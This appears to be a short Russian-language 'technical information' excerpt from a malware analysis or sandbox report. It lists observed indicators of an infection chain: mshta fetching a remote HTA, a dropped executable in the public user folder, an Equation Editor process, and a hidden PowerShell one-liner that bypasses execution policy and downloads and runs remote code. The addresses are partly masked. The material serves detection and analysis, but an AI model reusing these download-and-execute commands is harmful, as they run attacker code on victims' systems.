Техническая информация
- '%WINDIR%\syswow64\mshta.exe' http://17#.##.151.201:4545/hta &AAAAAAC
- C:\users\public\rnek.exe
- http://17#.##.151.201:4545/hta via 17#.#3.151.201
- http://17#.##.151.201:4545/get via 17#.#3.151.201
- DNS ASK pa###bin.com
- 'C:\users\public\rnek.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://17#....' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://17#.##.151.201:4545/hta &AAAAAAC' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding